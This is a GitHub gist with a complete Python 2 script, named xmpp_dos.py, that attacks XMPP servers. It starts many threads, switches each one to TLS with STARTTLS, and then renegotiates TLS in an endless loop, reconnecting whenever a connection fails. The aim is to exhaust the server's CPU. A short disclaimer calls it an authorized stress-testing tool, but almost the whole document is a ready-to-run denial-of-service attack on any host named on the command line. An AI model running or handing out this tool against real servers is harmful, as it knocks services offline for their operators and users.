Skip to content

Instantly share code, notes, and snippets.

@bitrot-sh
Created December 12, 2017 20:44
Show Gist options
  • Save bitrot-sh/21b88f32f9c3328fc279c5ba3ae48312 to your computer and use it in GitHub Desktop.
Save bitrot-sh/21b88f32f9c3328fc279c5ba3ae48312 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
"""
This is a stress-testing tool for checking whether an XMPP server is
vulnerable to TLS renegotiation load.
Use it legally and responsibly: only run it against servers you own or are
explicitly authorized to test.
Example: ./xmpp_dos.py localhost 5222 -t 10
A single host with 10 threads can often max out server CPUs.
"""
from __future__ import print_function
from socket import socket, AF_INET, SOCK_STREAM
from sys import exit
from time import sleep
from optparse import OptionParser
from nassl import TLSV1, SSL_VERIFY_NONE
from nassl.DebugSslClient import DebugSslClient
import threading
# Opening <stream:stream> header sent right after the TCP connect.
# "{0}" is a str.format placeholder that starttls() fills with the target host.
XMPP_OPEN_STREAM = (
    "<stream:stream"
    " xmlns='jabber:client'"
    " xmlns:stream='http://etherx.jabber.org/streams'"
    " xmlns:tls='http://www.ietf.org/rfc/rfc2595.txt'"
    " to='{0}'"
    " xml:lang='en'"
    " version='1.0'>"
)

# Element sent after the stream header to request the switch to TLS.
XMPP_STARTTLS = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
class SSLThread(threading.Thread):
    """Worker thread that holds one XMPP STARTTLS session and renegotiates it.

    Attributes set by the constructor:
        tid:  numeric id, used only in the "Connecting" log line.
        host: target host name; also substituted into the stream header.
        port: target TCP port.
        sock: current socket, or None before the first connect().
        ssl:  current DebugSslClient, or None before the first negotiate().
    """

    def __init__(self, tid, host, port):
        """Store the thread id and target address; no I/O happens here."""
        super(SSLThread, self).__init__()
        self.tid = tid
        self.host = host
        self.port = port
        self.sock = None
        self.ssl = None

    def run(self):
        """Thread entry point: establish a session, then loop in renegotiate()."""
        self.reconnect()
        self.renegotiate()

    def connect(self):
        """Open a new TCP socket (5 second timeout) to (host, port).

        The new socket replaces whatever was stored in ``self.sock``; the
        previous object is not closed here.
        """
        print("[+] Thread %d: Connecting" % self.tid)
        link = socket(AF_INET, SOCK_STREAM)
        self.sock = link
        link.settimeout(5)
        link.connect((self.host, self.port))

    def starttls(self):
        """Send the stream header and the STARTTLS request in plaintext.

        If the first reply contains ``<stream:error>`` an error is printed
        and ``exit(1)`` is called (raising SystemExit in the calling thread).
        If the first reply does not yet contain ``</stream:features>``, one
        more chunk is read and discarded before STARTTLS is sent.
        """
        link = self.sock
        link.send(XMPP_OPEN_STREAM.format(self.host))
        greeting = link.recv(4096)
        if '<stream:error>' in greeting:
            print("[!] Error connecting to %s:%d" % (self.host, self.port))
            exit(1)
        if '</stream:features>' not in greeting:
            # Features were not in the first chunk: read once more, ignore it.
            link.recv(4096)
        link.send(XMPP_STARTTLS)
        # The server's answer to STARTTLS is read but not inspected.
        link.recv(2048)

    def negotiate(self):
        """Wrap the socket in a DebugSslClient and run the initial handshake.

        The client is created with TLSV1 and SSL_VERIFY_NONE and stored in
        ``self.ssl`` before ``do_handshake()`` is called.
        """
        client = DebugSslClient(sslVersion=TLSV1, sock=self.sock,
                                sslVerify=SSL_VERIFY_NONE)
        self.ssl = client
        client.do_handshake()

    def reconnect(self):
        """Run connect(), starttls() and negotiate(), in that order."""
        for step in (self.connect, self.starttls, self.negotiate):
            step()

    def renegotiate(self):
        """Call ``do_renegotiate()`` forever, reconnecting on any Exception.

        An exception raised by reconnect() itself is not caught here and
        propagates out of the loop.
        """
        while True:
            try:
                self.ssl.do_renegotiate()
            except Exception:
                self.reconnect()
def main():
    """Parse the command line, start the worker threads and wait for Ctrl-C.

    Command line: ``prog [options] host port``; ``-t/--threads`` selects how
    many SSLThread workers are started (default 5).

    Exit statuses:
        1 -- wrong number of positional arguments, or the port is not an
             integer in the range 1-65535.
        2 -- ``--threads`` is not an integer (rejected by optparse) or is
             smaller than 1.
        0 -- interrupted with Ctrl-C after the workers were started.
    """
    print("[+] XMPP SSL/TLS renegotiation stress testing tool")
    usage = "usage: %prog [options] host port"
    parser = OptionParser(usage=usage)
    # type="int" lets optparse report a bad value with a usage message
    # instead of an uncaught ValueError traceback from int().
    parser.add_option("-t", "--threads", dest="threads", type="int",
                      help="Number of threads", default=5)
    (options, args) = parser.parse_args()

    if len(args) != 2:
        parser.print_usage()
        exit(1)

    num_threads = options.threads
    if num_threads < 1:
        # Zero or negative counts would start nothing and then sleep forever.
        parser.error("--threads must be at least 1")

    host = args[0]
    try:
        port = int(args[1])
    except ValueError:
        port = None
    if port is None or not 0 < port < 65536:
        print("[!] Invalid port %s" % str(args[1]))
        exit(1)

    threads = []
    for x in range(num_threads):
        worker = SSLThread(x, host, port)
        # Daemon threads do not keep the process alive once main() exits.
        worker.daemon = True
        worker.start()
        threads.append(worker)

    try:
        # The workers never return; the main thread just waits for Ctrl-C.
        while True:
            sleep(100)
    except (KeyboardInterrupt, SystemExit):
        print("[+] Stopping threads!")
    exit(0)


if __name__ == '__main__':
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment